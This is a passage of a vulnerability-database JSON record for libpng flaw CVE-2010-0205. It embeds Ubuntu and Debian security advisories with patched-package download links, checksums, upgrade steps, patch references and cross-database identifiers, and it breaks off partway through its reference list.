http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_powerpc.udeb\n Size/MD5: 72402 e0b80daed7db7e00d2a921ed5708ffe8\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_powerpc.deb\n Size/MD5: 173494 31c424c02fe594bb6cf9acd1bef1763f\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_powerpc.deb\n Size/MD5: 264450 b0546250e1804b0d385bb8eb714cd2da\n\n sparc architecture (Sun SPARC/UltraSPARC):\n\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_sparc.udeb\n Size/MD5: 67312 0df0d665eeb40343b9d5485910101786\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_sparc.deb\n Size/MD5: 168372 2a079837d6b9f47c41a02340c5d9e27c\n http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_sparc.deb\n Size/MD5: 257434 05811c8ff658321e91078f280dacfbe7\n\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2032-1 security@debian.org\nhttp://www.debian.org/security/ Giuseppe Iuculano\nApril 11, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : libpng\nVulnerability : several\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2009-2042 CVE-2010-0205\nDebian Bugs : 533676 572308\n\n\nSeveral vulnerabilities have been discovered in libpng, a library for\nreading and writing PNG files. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2009-2042\n\nlibpng does not properly parse 1-bit interlaced images with width values\nthat are not divisible by 8, which causes libpng to include\nuninitialized bits in certain rows of a PNG file and might allow remote\nattackers to read portions of sensitive memory via \"out-of-bounds\npixels\" in the file. \n\nFor the testing (squeeze) and unstable (sid) distribution, these\nproblems have been fixed in version 1.2.43-1\n\nWe recommend that you upgrade your libpng package. \n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.dsc\n Size/MD5 checksum: 1201 abe81b0d3c4aa7a1fa418e29f2c5b297\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz\n Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13\n http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.diff.gz\n Size/MD5 checksum: 19687 60ede1843ceb8a1f127c54b847a74dfa\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny3_all.deb\n Size/MD5 checksum: 880 028b00e28aad8282714776c5dcca64a8\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_alpha.udeb\n Size/MD5 checksum: 86562 d9c50af59951e972557d393409b75bf2\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_alpha.deb\n Size/MD5 checksum: 287752 1d7d84aee223c0933d1a616722607096\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_alpha.deb\n Size/MD5 checksum: 182436 001ecbf421f70ca521a3968f1d14c874\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_amd64.udeb\n Size/MD5 checksum: 71912 78fbe1a6568671e4c557ec12e29481b0\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_amd64.deb\n Size/MD5 checksum: 254500 481312a64867f31c363b7fbba9cfe171\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_amd64.deb\n Size/MD5 checksum: 167864 3d285c20d2f080313f82eb09dcb7261b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_arm.udeb\n Size/MD5 checksum: 64566 a4a9742190557d14beae40133fb46cf1\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_arm.deb\n Size/MD5 checksum: 245438 a16f62e771622e05812172f7c7066504\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_arm.deb\n Size/MD5 checksum: 159612 81facf06de458dd6b1e84a78bb1acfc8\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_armel.udeb\n Size/MD5 checksum: 67028 56fc4199656d239231c7b8d8e035fead\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_armel.deb\n Size/MD5 checksum: 245930 9f64181bc16af0ad0de4ba2e86b25706\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_armel.deb\n Size/MD5 checksum: 162504 3129e1c2360fcba0309257e2b1dff8ca\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_hppa.udeb\n Size/MD5 checksum: 73858 9d5a53e3258b5149bee68a4d20067bf9\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_hppa.deb\n Size/MD5 checksum: 169602 12ddce05c84ef675c348a1e64f1a277c\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_hppa.deb\n Size/MD5 checksum: 261788 9297cb916e57e2f912de3f16bcbae475\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_i386.deb\n Size/MD5 checksum: 246968 083d472fd65f884c91dff5926e538342\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_i386.deb\n Size/MD5 checksum: 165560 233945ee4b1e442357276431ce495a4c\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_i386.udeb\n Size/MD5 checksum: 70094 769336f4574678e56931e1a1eaf6be6a\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_ia64.deb\n Size/MD5 checksum: 305324 42d7265034b84662467bb75456653787\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_ia64.udeb\n Size/MD5 checksum: 111776 ad716022a6a22371bb83f3966ebe17d4\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_ia64.deb\n Size/MD5 checksum: 206866 572b9d18c5adba74a4e5b99714968a60\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_mipsel.deb\n Size/MD5 checksum: 262242 e905771ac3fa905cc03a3ddc8f9872dd\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_mipsel.udeb\n Size/MD5 checksum: 68370 4d44877866357a0fd8474fd8fe183616\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_mipsel.deb\n Size/MD5 checksum: 164154 93c02dbae7dfe59b77ce4b683b82eaef\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_powerpc.deb\n Size/MD5 checksum: 166402 1d470464fe2b493aef8d95dde5fd95d8\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_powerpc.udeb\n Size/MD5 checksum: 70682 1dd9713672dbac4a7434f1f96a1184b5\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_powerpc.deb\n Size/MD5 checksum: 253478 7a87577e07ed0bb9e759b973b2d7cf18\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_s390.udeb\n Size/MD5 checksum: 73470 52b1a911a81f133a83a387663aa3ffb2\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_s390.deb\n Size/MD5 checksum: 252988 18b4c8b17b3e30ab6cce89c21c99fbfc\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_s390.deb\n Size/MD5 checksum: 169264 601982b9a97707ab05e1f4469cd8e20e\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_sparc.deb\n Size/MD5 checksum: 161562 facd643206903acfa3a503c1d69e9248\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_sparc.udeb\n Size/MD5 checksum: 66032 cbbe521a9a5629987603a57b8c9f35be\n http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_sparc.deb\n Size/MD5 checksum: 247212 76b8fe782fd0e5f7546bd535f8d442bc\n\n\n These files will probably be moved into the stable distribution on\n its next update. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-0205"
},
{
"db": "CERT/CC",
"id": "VU#576029"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"db": "BID",
"id": "38478"
},
{
"db": "VULHUB",
"id": "VHN-42810"
},
{
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"db": "PACKETSTORM",
"id": "94522"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "87569"
},
{
"db": "PACKETSTORM",
"id": "87557"
},
{
"db": "PACKETSTORM",
"id": "87345"
},
{
"db": "PACKETSTORM",
"id": "88286"
}
],
"trust": 3.33
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-42810",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-42810"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#576029",
"trust": 3.7
},
{
"db": "NVD",
"id": "CVE-2010-0205",
"trust": 3.5
},
{
"db": "BID",
"id": "38478",
"trust": 2.9
},
{
"db": "SECUNIA",
"id": "38774",
"trust": 2.6
},
{
"db": "VUPEN",
"id": "ADV-2010-0517",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "39251",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "41574",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "62670",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1023674",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0667",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-2491",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0626",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0686",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-1107",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0682",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0605",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0637",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2010-0847",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "94522",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "87569",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-42810",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0847",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/1107",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0667",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0605",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/2491",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0626",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0517",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0686",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0682",
"trust": 0.1
},
{
"db": "VUPEN",
"id": "2010/0637",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2010-0205",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "94244",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "87557",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "87345",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "88286",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#576029"
},
{
"db": "VULHUB",
"id": "VHN-42810"
},
{
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"db": "BID",
"id": "38478"
},
{
"db": "PACKETSTORM",
"id": "94522"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "87569"
},
{
"db": "PACKETSTORM",
"id": "87557"
},
{
"db": "PACKETSTORM",
"id": "87345"
},
{
"db": "PACKETSTORM",
"id": "88286"
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"id": "VAR-201003-1082",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-42810"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:46:23.470000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435"
},
{
"title": "HT4435",
"trust": 0.8,
"url": "http://support.apple.com/kb/HT4435?viewlocale=ja_JP"
},
{
"title": "libpng-1.2.10-7.1.3.0.1.AXS3",
"trust": 0.8,
"url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=1210"
},
{
"title": "Security Advisory for libpng-1.4.0 and earlier, 27 February 2010",
"trust": 0.8,
"url": "http://libpng.sourceforge.net/ADVISORY-1.4.1.html"
},
{
"title": "Defending Libpng Applications Against Decompression Bombs",
"trust": 0.8,
"url": "http://libpng.sourceforge.net/decompression_bombs.html"
},
{
"title": "\u3010JVN \u306b\u63b2\u8f09\u3055\u308c\u305f\u8106\u5f31\u6027\u306b\u3064\u3044\u3066\u3011",
"trust": 0.8,
"url": "http://ja.bbs.luna.tv/viewtopic.php?f=68\u0026t=3721"
},
{
"title": "2078",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=2078"
},
{
"title": "2079",
"trust": 0.8,
"url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=2079"
},
{
"title": "RHSA-2010:0534",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2010-0534.html"
},
{
"title": "multiple_vulnerabilities_in_libpng",
"trust": 0.8,
"url": "http://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_libpng"
},
{
"title": "VMSA-2010-0014",
"trust": 0.8,
"url": "http://www.vmware.com/security/advisories/VMSA-2010-0014.html"
},
{
"title": "pictbear",
"trust": 0.8,
"url": "http://www.fenrir.co.jp/pictbear/"
},
{
"title": "libpng-1.4.1.tar.bz2",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=214"
},
{
"title": "lpng141.zip",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=218"
},
{
"title": "lpng141.7z",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=217"
},
{
"title": "libpng-1.4.1.tar.xz",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=216"
},
{
"title": "libpng-1.4.1.tar.gz",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=215"
},
{
"title": "linpng_txt.zip",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=219"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2010-0205 VU#576029 libpng stalls on highly compressed ancillary chunks",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=068ed551f848e5205f1c655154c5d17e"
},
{
"title": "Debian CVElist Bug Report Logs: libpng: CVE-2009-2042 \"out-of-bounds pixels\" vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5f5cf6ccf38dd0426354a95830317f34"
},
{
"title": "Debian Security Advisories: DSA-2032-1 libpng -- several vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=7efe228231e53c876f6e76ff8b041bb6"
},
{
"title": "Ubuntu Security Notice: libpng vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-913-1"
},
{
"title": "VMware Security Advisories: VMware Workstation, Player, and ACE address several security issues.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=b3571bd7da36d47dd9d3066ad9612f4c"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-400",
"trust": 1.1
},
{
"problemtype": "CWE-399",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-42810"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://www.kb.cert.org/vuls/id/576029"
},
{
"trust": 2.9,
"url": "http://libpng.sourceforge.net/advisory-1.4.1.html"
},
{
"trust": 2.6,
"url": "http://libpng.sourceforge.net/decompression_bombs.html"
},
{
"trust": 2.6,
"url": "http://www.securityfocus.com/bid/38478"
},
{
"trust": 2.6,
"url": "http://secunia.com/advisories/38774"
},
{
"trust": 2.6,
"url": "http://www.vupen.com/english/advisories/2010/0517"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4435"
},
{
"trust": 1.8,
"url": "http://www.vmware.com/security/advisories/vmsa-2010-0014.html"
},
{
"trust": 1.8,
"url": "http://www.debian.org/security/2010/dsa-2032"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-march/037237.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-march/037355.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-march/037364.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-march/037607.html"
},
{
"trust": 1.8,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:063"
},
{
"trust": 1.8,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:064"
},
{
"trust": 1.8,
"url": "http://lists.vmware.com/pipermail/security-announce/2010/000105.html"
},
{
"trust": 1.8,
"url": "http://osvdb.org/62670"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id?1023674"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/39251"
},
{
"trust": 1.8,
"url": "http://secunia.com/advisories/41574"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00002.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html"
},
{
"trust": 1.8,
"url": "http://ubuntu.com/usn/usn-913-1"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/0605"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/0626"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/0637"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/0667"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/0682"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/0686"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/0847"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/1107"
},
{
"trust": 1.8,
"url": "http://www.vupen.com/english/advisories/2010/2491"
},
{
"trust": 1.8,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56661"
},
{
"trust": 1.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0205"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu331391"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu576029/"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0205"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0205"
},
{
"trust": 0.3,
"url": "http://www.libpng.org/pub/png/libpng.html"
},
{
"trust": 0.3,
"url": "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_libpng"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100108439"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2042"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2249"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2249"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1205"
},
{
"trust": 0.2,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.2,
"url": "http://www.mandriva.com/security/advisories"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/400.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=572308"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/913-1/"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201010-01.xml"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/security/advisoiries"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-3277"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/download/player/"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/security"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3277"
},
{
"trust": 0.1,
"url": "http://kb.vmware.com/kb/1055"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0434"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/download/ws/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0425"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/security_response.html"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/player31/doc/releasenotes_player312.html"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/eos.html"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html"
},
{
"trust": 0.1,
"url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/eos_vi.html"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2042"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_lpia.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.2.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.5.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_amd64.udeb"
},
{
